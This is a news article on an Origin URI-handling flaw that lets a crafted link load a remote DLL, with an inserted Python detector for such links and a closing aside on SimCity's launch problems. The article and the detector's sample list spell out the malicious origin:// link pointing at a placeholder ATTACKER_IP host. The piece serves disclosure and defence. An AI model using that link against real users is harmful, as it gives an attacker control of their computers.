A vulnerability has been discovered in Electronic Arts' Origin game distribution service that allows attackers to remotely execute malicious code on players' computers. Demonstrated at the Black Hat security conference in Amsterdam, the attack takes just a few seconds to execute and puts the gamer's PC under the attacker's control. It works by manipulating the uniform resource identifiers (URIs) that EA's site uses to automatically start games on an end user's machine, without any interaction by the victim.
“The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism. In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim’s system, which has Origin installed,” wrote Malta-based ReVuln researchers Donato Ferrante and Luigi Auriemma in a paper accompanying last week’s demonstration.
How Does This Happen?
The EA platform uses the origin://LaunchGame/71503 link to launch the game.
When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers’ choosing on the victim’s computer.
When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren't prompted again. Users who have selected this setting can be attacked without taking any action themselves. Users who want to protect themselves should make sure they are prompted before Origin links are processed.
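An added defensive example, not taken from the ReVuln paper or from EA: a Python check that can be run over links seen in proxy, mail or chat logs and flags origin:// URIs carrying the CommandParams pattern described above. The function name, the finding strings and the sample links are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# UNC path (\\host\share\file) as it appears after percent-decoding.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]+")

def inspect_origin_uri(uri):
    """Return the reasons an origin:// URI looks unsafe (empty list if none)."""
    parts = urlsplit(uri.strip())
    if parts.scheme.lower() != "origin":
        return []
    findings = []
    # parse_qsl percent-decodes once; keep blank values so "CommandParams=" is seen.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != "commandparams":
            continue
        findings.append("CommandParams present")
        decoded = unquote(value)  # second pass catches double-encoded values
        if "-openautomate" in decoded.lower():
            findings.append("-openautomate argument")
        if UNC_RE.search(decoded):
            findings.append("UNC path to remote host")
    return findings

# Constructed sample links; ATTACKER_IP is the placeholder used in the article.
SAMPLES = [
    "origin://LaunchGame/71503",
    r"origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll",
    "origin://LaunchGame/71503?CommandParams=%20-openautomate%20%5C%5CATTACKER_IP%5Cevil.dll",
    "https://example.com/?CommandParams=x",
]

if __name__ == "__main__":
    for link in SAMPLES:
        reasons = inspect_origin_uri(link)
        print("FLAG" if reasons else "ok  ", link, reasons)
```

A plain launch link produces no findings, while any origin:// link that supplies CommandParams is reported, with the -openautomate argument and the remote UNC path listed as separate reasons.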
This vulnerability adds to EA's woes, as the company has already been suffering from the troubled launch of SimCity Online, the much-awaited city-building and urban planning simulation video game, which launched recently and faced several issues. Most users, while trying to play the game, received a message saying, “SimCity Servers are down. Attempting to reconnect” at the top-left corner of their screens.
The gaming company even offered a free game to all the gamers who bought the game and suffered through all of the connection and disconnection problems. Though EA is doing its best to save itself from the situation, let’s see how it comes through.